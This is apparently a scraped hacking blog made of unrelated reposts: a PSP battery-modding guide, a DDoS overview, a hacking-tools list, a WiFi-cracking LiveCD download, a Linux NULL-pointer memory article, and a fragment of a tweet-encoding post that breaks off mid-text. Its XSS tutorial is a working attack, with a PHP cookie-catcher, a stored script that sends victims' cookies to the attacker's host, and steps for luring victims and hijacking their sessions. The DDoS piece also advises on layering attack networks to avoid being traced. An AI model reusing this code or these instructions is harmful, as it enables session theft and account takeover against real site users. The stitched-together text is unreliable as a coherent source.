A)Around the world lol. I moved.....

Q)Whats with the pictures and videos?
A)Sorry if the quality isnt that good. If anyone feels they can do better, do so and i will add them and give them their props lol.

Well, with that out of the way, lets get started!!!!

We will now discuss how the tutorial is going to be organized (because organizations is a key factor in many great posts lol)
1)Questions and Answers
2)Materials Required
3)Process #1: Creating the Magic Memory Stick
4)Process #2: Creating the Magic Memory Stick with a bricked psp
5)Process #3: Moving the partitions
6)Process #4: Hardmodding the battery
7)Testing your battery
8)Running the files
9)Tips and Tricks
10)Final Questions
11)Information Links
12)Download Links
13)For Nerds ONLY (how this works)
14)Upgrading Custom Firmware
15)Error Fixing
16)Windows Vista
17)DA Time Machine (This covers how to bypass the ressurection.elf and how to use it)
18)Pictures/Videos

Now that we understand that, we can now continue with the guide. So first up is "Materials"
(NOTE: The materials will be organized by 1)Name and then by 2)Amount needed)

Materials:
----------
A psp (1)
A psp battery (2)
A memory stick pro duo with 512MB or more, NO LESS (1)
A mini USB or Memory Card Reader (1)
A computer with an internet connection (1)
A knife/exacto knife (1)
A needle, safety pin, tooth pick, etc (1)
Winrar (see Download Section)

Now i assume that these are common household material (if not you can buy them all at a walmart for about $50 or less)

Process #1: Creating the Magic Memory Stick
--------------------------------------------
(NOTE: this is for working psp's. so if your psp is bricked, you dont have to do this one. just go to the next one)
1)Turn on the psp and go into USB mode
2)Download Winrar (see download section) if you havent already
3)When your computer detects the psp, go to "My Computer"
4)Right-click on your psp's drive and select "Format"
5)Format the memory stick
6)Next download the "universal unbricker" (which is in the download section)
7)Place all the files inside of it onto your psp's drive. These files should include:
==three folders called "PSP", "kd", and "registry"
==three eboots called "150.pbp", "340.pbp", and "371.pbp"
==one bin file called "msipl.bin"

once done with that, move to "Process #3: Moving the Partitions"

Process #2: Creating the Magic Memory Stick with a bricked psp:
---------------------------------------------------------------
In order to do this, we are going to need a Memory card Reader/Writer.
1)Plug your Memory Stick in via Card Reader
2)Follow the above tutorial from step 2-7

Process #3: Moving the Partitions:
---------------------------------
(NOTE: Keep your memory stick in through USB or card reader)
1)Download the partition mover
2)Extract the folder "msinst" to your hard drive (C:\)
3)Go to "My Computer" and find your PSP drive letter (Removable Disk ?)
4)Go to "Start"
5)Go to "Run"
6)Type in "cmd" and press OK

from here, there should be a black and silverish white screen. If so, your all good and are ready to continue.

7)Type this in: "cd C:\msinst"
8)Next, type in "msinst ? msipl.bin" (remember No quotes) (also, replace ? with your removable disk letter)(also, use a capital letter to represent your drive. example: C:\msinst>msinst J msipl.bin)
9)It will show some stuff and give you 2 options. 1)Y=Yes 2)N=No........of course, press Y and then enter
10)You should receive a confirmation that the partitions were successfully moved

and thats it! your done with your magic memory stick and partition moving!!!!! That wasnt so hard now was it?
Now, lets continue!

Process #4: Hardmodding the battery:
------------------------------------
1)Take your battery and open it using a knife or exacto knife
2)look on the main board for the display "ICO4" or "CO4" (depending on your battery)
3)Now, take a needle or something like that and remove pin #5
here is a diagram: (NOTE: you can find pin #5 easily when the ICO4 or CO4 display is facing you!!!!)
__ (pin 4) __ (pin 8)
__ (pin 3) __ (pin 7)
__ (pin 2) __ (pin 6)
__ (pin 1) __ (pin 5)
a better diagram of it can be found on ben hecks page (see links)
4)After that, put your battery back together.

congratulations, you just softmodded your battery!!!!!

Testing your battery:
---------------------
Your will know if you successfully made your battery when:
1)you inert the battery and the green power LED comes on
if it doesnt come on, you did now make it correctly!

Running the files:
-----------------
Once your battery and your memory stick are being used at the same time, you will now have a "Pandora's Battery"
so.........................
1)put in your magic Memory Stick
2)Put in your softmodded battery
*if you see your wifi LED and memory stick LED blink, you have it working!!!!!!! as though in most occasions your screen wont light up but if it does, thats always good too*
3)When your LED's are don flashing, press "[]" (square) to dump your nand flash (just in case you brick. be warned, the file is anywhere from 32MB-64MB depending on your psp)
4)After that is done, you will be required reboot, so press X (cross) when your LED's are done flashing or when instructed to)
5)Re-put in your battery and the pandora menu will load
6)Press X (cross) to install 3.71M33
7)After thats done, you will need to reboot again (press X (cross) when instructed to or when the LED's are done flashing)
8)Now, remove your battery
9)Plug in your charger
10)Turn on the psp
11)Put in your battery
12)Remove the charger
13)And you should now be running 3.71M33!!!!!

Tips and tricks:
---------------
1)Run the v3 universal unbricker when your done so you can see the text (on slim psp's or fat)
2)Buy a new battery (if your cheap, see the 1st question on "Final Questions"
3)Remember NOT ALL homebrew is compatible with the psp slim!!

Final Questions:
---------------
(Q)Can i ever dual boot my XMB and my battery
(A)Yes! you can do this only one way. you need to buy a switch and solder on the + and - connector to the batter and to the switch. This will allow you to choose when you want to boot into pandora's battery or into your XMB (see links)

(Q)When i insert my softmodded battery, the psp turns on but i cant see anything
(A)Thats because your probably using a psp slim which in that case, just press X and then install the V3 unbricker

(Q)The light comes on but my MS LED and my wofi LED doesnt do anything
(A)This is a common problem when you dont follow the instruction EXACTLY, you have to re-create the magic memory stick

(Q)Did you create this?
(A)No, i did not. Ben Heck did and all details can be found on his site (see links)

It is also good to mention that this method is for the "fat" psp model, if you own a slim, lift the #4 pin instead of the #5 pin from the battery.

Download Links:
----------------
Partition Mover:http://www.ziddu.com/download/11123243/msinst.rar.html
Universal Unbricker: http://rapidshare.com/files/75256518/Pandora_Files_-_Move_to_the_root_of_your_memory_stick.rar.html

Quick introduction to DoS and DDoS

2010-07-30T04:49:00.000-07:00

With the current expansion of Internet worldwide, it became extremely necessary the creation of new forms of attacks by the hacker community, the concept of DoS (Denial of Service) and DDoS (Distributed Denial of Service) was born. This type of attack became popular by targeting entities where the availability of various services is the key to the entity's success as well as the reason for its existence, amongst those entities we can include as examples, Banks, ISP, E-commerce websites, etc.. Where every hour, minute or even second means the possible loss of huge amounts of money.

Pre-Attack and Pre-Requirements

It became, for quite a long time an unsolved puzzle for many security professionals the choice of the best time to create an attack network, pre-target-identification or post-target-identification, for sake of neutrality let's say that the best time depends on the objective to achieve, the attacker's mentality and its skills.
We can easily understand that creating a pre-target-identification attack network that is fully functional at the zero attack hour has the same impact as a post-target-identification attack network of the same size ,power and is completely functional but in reality this is not completely true. A pre-target-identification has to be idle for more time, therefore causing network nodes to become inactive either by a sysadmin covering/fixing/patching the attacker's entry point or by the implementation of more restrictive security measures.
The attack methodology used for the expansion of an attack network have been modified since the earliest *DoS attacks, what started as simple Host-by-host attack and the successive host append to the network turned into a battle of "intelligent" scripts/worms capable of doing the job by their own means without almost no human intervention on the process and with a power far more superior than the individual host attack method.
Once formed the attack network, let's look at the attacker as a pyrotechnic technician with all his fireworks ready to launch and begin the show...The countdown clock reaches zero... The attacker presses the trigger (or some pre scheduled event occurs)... The show begins... But what happens?

Post Attack Analysis

From the uninformed victim's point of view, the attack was apparently conducted by various attackers at the same time, almost like an army that marched towards a castle, the real enemy would be the army's leading person and the army itself would just be the attacker's puppets, this lack of knowledge gives the attacker some time, making the victim go through all of the painful "Back-trace" process which sometimes due to a small budget, the high adjacent cost of the analysis and depending on the dimension of the damages caused can lead to the suspension of the attack's forensics.

Protection layers

It is fairly trivial that the more protection layers exist between the attacker and the victim, more anonymous and protected the attacker's identity will be and more difficulties will the victim run across to unveil the attack source.
An elevated number of layers will, as expected, create "lag" between layers which can lead, if badly idealized, to the total of partial failure of the attack, on the other hand a small number of layers can lead to an easy detection of the attacker and therefore, large prejudice for the attacker, it is, in sum, essential to create a balance between both extremes to obtain a successful attack and effective risk distribution.

Other types of DoS

Examples of other attacks aimed at basic and essential company and individual's resources which are "un-wired" can include amongst others, electrical or telephonic cuts, extreme adverse climate conditions (bearing in mind that this attack is however not controlled by the attacker), access cuts (roads,etc..) and probably the most common used forms, the interception and/or manipulation followed by a negation of information or data transmitted via mail etc..

refrence:http://www.astalavista.com/page/articles/_/lectures/quick-introduction-to-dos-and-ddos-r25

Top 10 Linux Hacking Tools

2010-07-16T16:39:00.000-07:00

For installation of packages for :

Ubuntu: apt-get install program name
Fedora: yum install program name
Open Suse: yum install nessus program name
Debain: apt-get install nessus program name
Gentoo: emerge -v program name
Arch Linux: pacman -S program name
Just Replace program name with the program you want to install. Again if you need any help PM me.

1. Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

2. Aircrack :
~The fastest available WEP/WPA cracking tool~
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

3. Nessus :
~Premier UNIX vulnerability assessment tool~
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited â€œHome Feedâ€ is still available, though it is only licensed for home network use. Some people avoid paying by violating the â€œHome Feedâ€ license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

4. Snort :
~Everyone's favorite open source IDS~
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

5.WireShark:
~Sniffing the glue that holds the Internet together~
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

6. John the Ripper :
~A powerful, flexible, and fast multi-platform password hash cracker~
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here

**NOTE For John the Ripper the program,the name you use is john to install**
eg. apt-get install john

7. Kismet :
~A powerful wireless sniffer~
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating.

8. Metasploit Framework :
~Hack the Planet~
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

***You can not install Metasploit Framework, But you can read about it here**

9. Nikto :
~A more comprehensive web scanner~
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

10. Netcat :
~The network Swiss army knife~
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits

11.THC Hydra:
~A Fast network authentication cracker which supports many different services~
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

You can get THC Hydra from HERE

12. Ettercap :
In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

reference:hackforums.net

[Tut] How to Hack a Website by XSS

2010-07-13T07:02:00.000-07:00

Hello Guys !

I am going teach you How to hack a website through XSS (Persistent Cross Site Scripting).

I wrote it because i didnt find a Nice Tut to explain XSS. I didnt added much pics as I dont want to hack an website for just a tut. But this is pretty much easy and you will learn without much difficulties.

" Something about XSS " :-

XSS is basically using java scripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.
XSS is a very large concept and your success rate depends on your imagination and experience.
Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something.
Where XSS is just understanding the way we can use java scripts,
and the vulnerabilities of the website may be at the different places for executing your java scripts.

So I could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with
XSS is Cookies. The cookies are used to maintain user authentication of respective website.

" XSS " :-

* Search terms :- Almost all of the websites have search boxes where you can try to search something from the website.
In the search box you can type your malicious script and check the vulnerability.

* Text Boxes :- If you see any type of text boxes in the website which will basically let you
put some query in it.

So we are trying to find a place where we can write something, which will later be shown in the same webpage.

" Types of XSS " :-

There are 2 types of XSS vulnerability.

1. Persistent Cross Site Scripting

2. Non-persistent Cross site Scripting.

Lets go for Persistent Cross Site Scripting.

" Persistent Cross Site Scripting " :-

Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.

Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.

Lets Suppose we have http://www.example.com.
Its just for Example and actually example 's website Doesnt exist ! =P

" Checking for Vulnerability " :-

Now, the very first thing we will have to see is a place where we can input some text,
and later on that should be displayed.

For example of secure sites,in Hackforums.com, we have a search bar, so in the search bar lets
put “test” and hit enter.
You will see that it will say “Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again.”.
But you should notice here that it doesn’t say “No search results found for “test”.
So it means that it is not Echoing the word that we put into the search bar.
So there is no chance to exlpoit the search bar of Hackforums.

" Testing Java Scripts " :-

Now, since we know that the website is vulnerable to XSS.
We will try to run a small java script into the website.

script type="text/javascript" alert('test') script

So what this will do is, it will popup a little alert box saying “test” on it.
And if it does that, it means that it accepts the javascripts input as well.

Remember : you can even use -

script type="text/javascript" alert('your Name') script

It will show something like -

Once, you’re done just clikc on the "Ok" or “Preview” button at the bottom.
And in the next page you should get a popup that says “test”.

" Finding Cookies " :-

Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.

javascript:alert(document.cookie)

As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us.

Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.

" Creating Cookie Catcher " :-

Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.

[?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’

’);
fclose($fp);
header (“Location: http://www.yoursite.com”);
?]

Just a little elaboration about the script. The first statement will get the cookies.
Second statement will get the IP. Third statement will get the referer. T
he last link would send the victim to “Yoursite.com”.
To make it a little less suspecious, you can change the link to example.com,
so the victim wouldnt see anything unusual. so on. Copy the given code and put it into a notepad.
Save it as something.php. Just make sure that you change the format to “.php”.

You’ll need a free webhosting account where you can upload the file. I personally use “spam.com”, so create an account there and upload this php file. Make sure that you change its permissions to “777″.

" Testing Cookie Catcher " :-

Now, as you guyz have seen that we have been executing a little script in that page which brings
up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher.

script document.location=”link-of-your-cookie-catcher?c=” + document.cookies script

" Elaboration on the script " :-

Document.Location will change the location of the website and we have set it equals to the
link of your cookies catcher and “?c=” we’ve added because its a get statement.
“+ document.cookies” means to visit your cookie catcher with the cookies of your victim’s site
so it can record it.

Now, here is the second

Lets try if it works or not. I am going to using the script that I have shown in the
“Something” page of example.com.

Now, If you click on Ok or Preview, it will take you to yoursite.com OR whatever you have changed
the link to in the Cookie Catcher. Now, lets login back to spam.com account, and you will
notice another “cookies.html” file has been added, automatically.

Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file.

Cookie: undefined
IP: MY IP
Date and Time: 3 April, 2010, 2:03 am
Referer: http://www.example.com/preview.php?incli...ect=2009&i[/color]ncident_hour_select=8&incident_min_select=30&incident_AMPM_
select=AM&policyNo=&cellNo=&preview=Preview

Note: This will look a little different from actual cookies, because when i stole these,
i wasnt logged in, so if a user is logged in, then you should get a little different from this.

Now, Get “cookie editor” addon of mozilla firefox.

" Stealing Actual Cookies " :-

Till now, we were our own victim, we were trying to steal our own cookies to make sure this works.
Now, lets try to get some actual victims. In the site, you may have to PREVIEW the post first and
then submit it. So the javascript is getting executed whenever you preview it, so we can not
submit it because the script is already executed. And may be in other sites, you can directly
submit the post, so the moment someone opens it, you will get the cookies.

Whenever you put the script in the “NAME” and something something in other fields, you click on preview,
QUICKLY, before it redirects you to the website as described in your cookie stealer,
the URL will change to something else for a moment.
Thats what you will have to copy. What i copied was this.

http://example.com/preview.php?inclinati...ew=Preview

And then , you just give this link to your victim, as soon as they click ON it, you get the cookies.

It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link,
you will actually submit the report. So as soon as someone reads it you get the cookies.

refernce:hackforums.net [cyclone]

WIFISLAX-Live CD WIFI Hack

2010-07-07T12:29:00.000-07:00

Wireless Hacking LiveCD FBI 2010 | 630 MB

An edited and slightly updated version of the popular LiveCD for working with wireless networks. Based on Ubuntu, provides a graphical interfeys.Disk boot, there is a script to be installed on the PC hard drive or a virtual machine (VirtualPC is not supported). Integrated over 50 tools to work with the network – scanners, sniffers, password crackers, and so on. utility.Krome of this – a full Linuhe sustainable yadrom.Posle installed on the hard disk system can be Russified, supplemented, adjusted to taste vladeltsa.V addition to the Back Track 4 – a very powerful set of tools to work with networks in the first place – besprovodnymi.Imeetsya a decent set of drivers for many types adapterov.V inete in various models has been known since 2007, the popular view that his creation had to do with the FBI.
Requirements:
RAM] 256 Mb
CPU] 800 GHz
HDD] 4 Gb

Checksums:
CRC32: 0D504602
MD5: D6E4E9DBCE86DC165DCF24808 1E4F421
SHA-1: 489BE5B921211986F47EECA42 EE516275BE94267

Year: 2010
Developer: GNU
Type: Hack & Tools
Medicine: Not required
Size: 630 MB

http://hotfile.com/dl/42033254/285b29c/Wireless_Hacking_LiveCD_FBI_v_2010.part1.rar.html
http://hotfile.com/dl/42033361/eed387f/Wireless_Hacking_LiveCD_FBI_v_2010.part2.rar.html
http://hotfile.com/dl/42033499/4ee96bb/Wireless_Hacking_LiveCD_FBI_v_2010.part3.rar.html
http://hotfile.com/dl/42033607/596db3c/Wireless_Hacking_LiveCD_FBI_v_2010.part4.rar.html

reference:r00tsecurity

Much ado about NULL: An introduction to virtual memory

2010-07-02T07:44:00.000-07:00

Here at Ksplice, we’re always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.
If you’ve ever programmed in C, you’ve probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded “Segmentation Fault”. Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today’s installment, we’ll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I’ll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!
What’s in a pointer?
There’s nothing fundamentally magical about pointers in C (or assembly, if that’s your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer’s memory. We can write a C program to print out a random pointer:

#include
int main(int argc, char **argv) {
printf("The argv pointer = %d\n", argv);
return 0;
}

Which, if you run it on my machine, prints:
The argv pointer = 1680681096
(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that’s just a notational thing. They’re still just integers.)
NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it’s just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.
But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you’re browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It’s actually even worse than that: a bug in IE can even take down the entire operating system.
This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other’s memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program’s address space to different pieces of physical memory.

mmap(2)
One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.
Because each application has its own address space, however, it is free to do with it as it wants. For instance, you’re welcome to declare that NULL should be a valid address in your application. We refer to this as “mapping” the NULL page, because you’re declaring that that area of memory should map to some piece of physical memory.
On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
Let’s go through those arguments in order (All of this information comes from the man page):
addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a “page”, which is 4k (4096 bytes) on x86 processors.
prot
Short for “protection”, this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process’s address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we’re going pass MAP_ANONYMOUS in flags, which indicates that we don’t want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.
If we just want to be able to read and write the NULL pointer, we’ll want to set addr to 0 and length to 4096, in order to map the first page of memory. We’ll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we’ll set them to -1 and 0 respectively.
Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!
(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you’ll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)
#include
#include

int main() {
int *ptr = NULL;
if (mmap(0, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
== MAP_FAILED) {
perror("Unable to mmap(NULL)");
fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
return 1;
}
printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
*ptr = 17;
printf("Now it's: %d\n", *ptr);
return 0;
}
Next time, we’ll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel’s address space. And, I’ll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!
The 1st International Longest Tweet Contest
Posted in Programming on March 25th, 2010 by Keith Winstein – 30 Comments
How much information is in a tweet?
There are a lot of snarky answers to that. Let’s talk mathematically, where information is measured in bits: How many bits can be expressed in a tweet?
It’s kind of fun to try to figure out how to cram in the most information. Our current in-house record is 4.2 kilobits (525 bytes) per tweet, but this can definitely be bested. Twitter’s 140-character limit has been under assault for some time, but nobody has decisively anointed a winner.
To that end, announcing the 1st International Longest Tweet Contest, along the lines of the International Obfuscated C Code Contest. The goal: fit the most bits of information into a tweet. There will be glorious fame and a T-shirt for the winner. More on that later. But first, a dialog:
Ben Bitdiddle: How big can a tweet get? SMS is limited to 160 characters of 7-bit ASCII, or 1,120 bits. Since Twitter based their limit on SMS but with 20 characters reserved for your name, a tweet is probably limited to 140 × 7 = 980 bits.
Alyssa P. Hacker: Not quite — despite its SMS roots, Twitter supports Unicode, and the company says its 140-character limit is based on Unicode characters, not ASCII. So it’s a lot more than 980 bits.
Ben: Ok, Unicode is a 16-bit character set, so the answer is 140 × 16 = 2,240 bits.
Alyssa: Well, since that Java documentation was written, Unicode has expanded to cover more of the world’s languages. These days there are 1,112,064 possible Unicode characters (officially “Unicode scalar values”) that can be represented, including in the UTF-8 encoding that Twitter and most of the Internet uses. That makes Unicode about 20.1 bits per character, not 16. (Since log2 1,112,064 ≈ 20.1.)
Ben: Ok, if each character can take on one of 1,112,064 possible values, we can use that to figure out how many total different tweets there can ever be. And from that, we’ll know how many bits can be encoded into a tweet. But how?
Alyssa: It’s easy! We just calculate the total number of different tweets that can ever be received. The capacity of a tweet, in bits, is just the base-2 logarithm of that number. According to my calculator here, 1,112,064 to the 140th power is about 28.7 quattuordecillion googol googol googol googol googol googol googol googol. That’s the number of distinct 140-character messages that can be sent. Plus we have to add in the 139-character messages and 138-character messages, etc. Taking the log, I get 2,811 bits per tweet.
Ben: We’d get almost the same answer if we just multiplied 20.1 bits per character times 140 characters. Ok, 2.8 kilobits per tweet.
Alyssa: I just discovered a problem. There aren’t that many distinct tweets! For example, I can’t tell the difference between the single character ‘<’ and the four characters ‘<’. I also can’t send a tweet that contains nothing but some null characters. So we have to deflate our number a little bit. It’s tricky because we don’t know Twitter’s exact limitations; it’s a black box.
Ben: But the answer will still be roughly 2.8 kilobits. Can we do better?
Alyssa: By golly, I think we can! Turns out Unicode is basically identical to an international standard, called the Universal Multi-Octet Coded Character Set, known as UCS or ISO/IEC 10646. But the two standards weren’t always the same — in the 90s, there was a lot of disagreement between the computer companies who backed Unicode and proposed a simple 16-bit character set, and the standards mavens behind UCS, who wanted to accommodate more languages than 65,536 characters would allow. The two sides eventually compromised on the current 20.1-bit character set, but some historical differences still linger between the two “official” specifications — including in the definition of the UTF-8 encoding that Twitter uses. Check this out:

Alyssa: Although Unicode’s UTF-8 can only encode the 1,112,064 Unicode scalar values, UCS’s version of UTF-8 is a lot bigger — it goes up to 31 bits!
Ben: So, when Twitter says they use UTF-8, which version are they using? Unicode, or UCS?
Alyssa: Hmm, that’s a good question. Let’s write a program to test. I’ll send Twitter a really big UCS character in UTF-8, represented in octal like this. This is way outside the bounds of well-formed Unicode.

$ perl -Mbytes -we 'print pack "U", (2**31 - 5)' | od -t o1
